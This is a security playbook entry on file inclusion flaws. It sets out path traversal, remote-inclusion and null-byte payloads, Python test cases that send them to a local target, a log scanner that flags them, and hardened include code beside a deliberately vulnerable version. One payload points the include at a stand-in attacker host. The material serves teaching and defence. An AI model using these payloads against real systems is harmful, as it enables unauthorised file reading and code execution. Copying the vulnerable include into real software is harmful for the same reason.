# File Inclusion

#### Description

File Inclusion occurs when a web application builds the path of a file it includes from user input without proper validation. An attacker who controls that path can read sensitive files from the server (Local File Inclusion) or, where the runtime allows including remote URLs, execute attacker-supplied code (Remote File Inclusion).

#### Example with Scenario

**Scenario:** A web application dynamically includes a file based on a URL parameter. An attacker can manipulate the parameter to include sensitive files from the server.

#### Payloads and Test Cases

**Payloads**

1. **Local File Inclusion (LFI):**

   ```
   /include?file=../../../../etc/passwd
   ```
2. **Remote File Inclusion (RFI):**

   ```
   /include?file=http://attacker.com/malicious.php
   ```
3. **Null Byte Injection:**

   ```
   /include?file=../../../../etc/passwd%00
   ```
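
Defender-side counterpart to the three payload shapes above, added here as an example and not part of the original playbook: a small Python scanner over constructed access-log lines that flags the `file` parameter when it carries a traversal sequence, a remote URL scheme or a null byte. Values are percent-decoded repeatedly so double-encoded variants are caught. The log lines, the `/include` endpoint and the parameter name are assumptions taken from the payloads above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /include?file=about.html HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /include?file=../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /include?file=http://attacker.com/malicious.php HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /include?file=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /include?file=%252e%252e/etc/passwd HTTP/1.1" 404 0
"""

# source, timestamp, method, request path, status code
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_repeatedly(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded payloads such as %252e%252e are normalised to '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(param_value):
    """Return the file-inclusion indicators present in one parameter value."""
    v = decode_repeatedly(param_value)
    indicators = []
    if ".." in v.replace("\\", "/"):
        indicators.append("traversal")
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.IGNORECASE):
        indicators.append("remote-url")
    if "\x00" in v:
        indicators.append("null-byte")
    return indicators


def scan_log(text, param="file"):
    """Parse each request line and report hits on the given query parameter."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, ts, method, path, status = m.groups()
        # parse_qs already percent-decodes once; classify() decodes further.
        values = parse_qs(urlsplit(path).query, keep_blank_values=True).get(param, [])
        for value in values:
            inds = classify(value)
            if inds:
                findings.append({"src": src, "time": ts, "method": method,
                                 "status": int(status), "value": value,
                                 "indicators": inds})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["src"]} {hit["status"]} {hit["indicators"]} {hit["value"]!r}')
```

A 200 response paired with a traversal hit is the line to triage first; the 404 and 500 lines still show the probing and are worth correlating by source address.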

**Test Cases**

1. **Local File Inclusion (LFI):**
   * **Payload:**

     ```
     /include?file=../../../../etc/passwd
     ```
   * **Test Case:**

     ```python
     import requests

     TARGET = "http://localhost:8080"  # base URL of the application under test (assumed)
     # Send payload to the server
     resp = requests.get(TARGET + "/include?file=../../../../etc/passwd")
     # Verify if the application includes the /etc/passwd file
     assert "root:x:0:0" in resp.text, "response does not contain /etc/passwd content"
     ```
2. **Remote File Inclusion (RFI):**
   * **Payload:**

     ```
     /include?file=http://attacker.com/malicious.php
     ```
   * **Test Case:**

     ```python
     import requests

     TARGET = "http://localhost:8080"  # base URL of the application under test (assumed)
     REMOTE_MARKER = "RFI-TEST-MARKER"  # unique string emitted by the file served at the test host (assumed)
     # Send payload to the server
     resp = requests.get(TARGET + "/include?file=http://attacker.com/malicious.php")
     # Verify if the application includes the remote file
     assert REMOTE_MARKER in resp.text, "remote file was not included"
     ```
3. **Null Byte Injection:**
   * **Payload:**

     ```
     /include?file=../../../../etc/passwd%00
     ```
   * **Test Case:**

     ```python
     import requests

     TARGET = "http://localhost:8080"  # base URL of the application under test (assumed)
     # Send payload to the server (%00 is sent literally; requests leaves it encoded)
     resp = requests.get(TARGET + "/include?file=../../../../etc/passwd%00")
     # Verify if the application includes the /etc/passwd file despite the null byte
     # (null-byte truncation only affects older runtimes; a current one should reject it)
     assert "root:x:0:0" in resp.text, "response does not contain /etc/passwd content"
     ```

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain malicious paths.
   * Use allow-lists to restrict input to expected file paths.
2. **Disable Dynamic Inclusion:**
   * Avoid using dynamic file inclusion based on user input.
   * Use static file paths or mapped identifiers for inclusion.
3. **Limit File Access:**
   * Restrict file access permissions to only necessary files.
   * Use chroot or containerization to limit file system exposure.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing file system structure.
   * Return generic error messages without disclosing sensitive information.
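
The four mitigations above, worked through in one piece of Python that is an added example and not code from the original playbook: a deliberately vulnerable `include_unsafe` that mirrors `/include?file=...`, beside `include_safe` (allow-list pattern, NUL and URL-scheme rejection, containment check on the resolved path, generic error) and `include_mapped` (identifiers mapped to files server-side). The template directory, the page names and the "secret" file are constructed in a temporary directory for the demonstration. Null-byte truncation of paths only affects some older runtimes, but a NUL in a file name is never legitimate, so it is rejected outright.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

# Constructed demo layout (assumption): a template root with one page, and a
# sensitive file one level above it that the include must never reach.
ROOT = tempfile.mkdtemp(prefix="fi-demo-")
TEMPLATE_DIR = os.path.join(ROOT, "templates")
os.makedirs(TEMPLATE_DIR)
with open(os.path.join(TEMPLATE_DIR, "about.html"), "w") as f:
    f.write("<h1>About</h1>")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("TOP-SECRET")


def include_unsafe(name):
    """Vulnerable form of `/include?file=...`: the path is built straight from
    user input, so `../secret.txt` (or an absolute path, which os.path.join
    lets replace the base) walks out of the template root."""
    with open(os.path.join(TEMPLATE_DIR, name)) as fh:
        return fh.read()


class IncludeError(Exception):
    """Any rejected request; the caller answers with one generic message."""


# Mitigation 1: allow-list what a page name may look like.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.html$")


def include_safe(name):
    """Hardened include: reject NUL bytes and URL schemes, enforce the
    allow-list pattern, then confirm the resolved path is still inside the
    template root (defence in depth, e.g. against symlinks)."""
    if "\x00" in name or urlsplit(name).scheme:
        raise IncludeError("rejected")
    if not SAFE_NAME.match(name):
        raise IncludeError("rejected")
    root = os.path.realpath(TEMPLATE_DIR)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise IncludeError("rejected")
    try:
        with open(target) as fh:
            return fh.read()
    except OSError:
        # Mitigation 4: do not echo the path or the OS error to the client.
        raise IncludeError("rejected") from None


# Mitigation 2: expose identifiers, not file names, and map them server-side.
PAGES = {"about": "about.html"}


def include_mapped(page_id):
    filename = PAGES.get(page_id)
    if filename is None:
        raise IncludeError("rejected")
    return include_safe(filename)


def is_rejected(func, value):
    """True when func(value) refuses the request with IncludeError."""
    try:
        func(value)
    except IncludeError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe, ../secret.txt ->", include_unsafe("../secret.txt"))
    for bad in ["../secret.txt", "/etc/passwd",
                "http://attacker.com/malicious.php", "about.html\x00"]:
        print("safe,", repr(bad), "rejected:", is_rejected(include_safe, bad))
```

Mitigation 3 (file permissions, chroot or a container) sits outside the application code and is the layer that limits damage if any of the checks above are bypassed; `include_mapped` is the form to prefer, since the client never supplies a file name at all.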
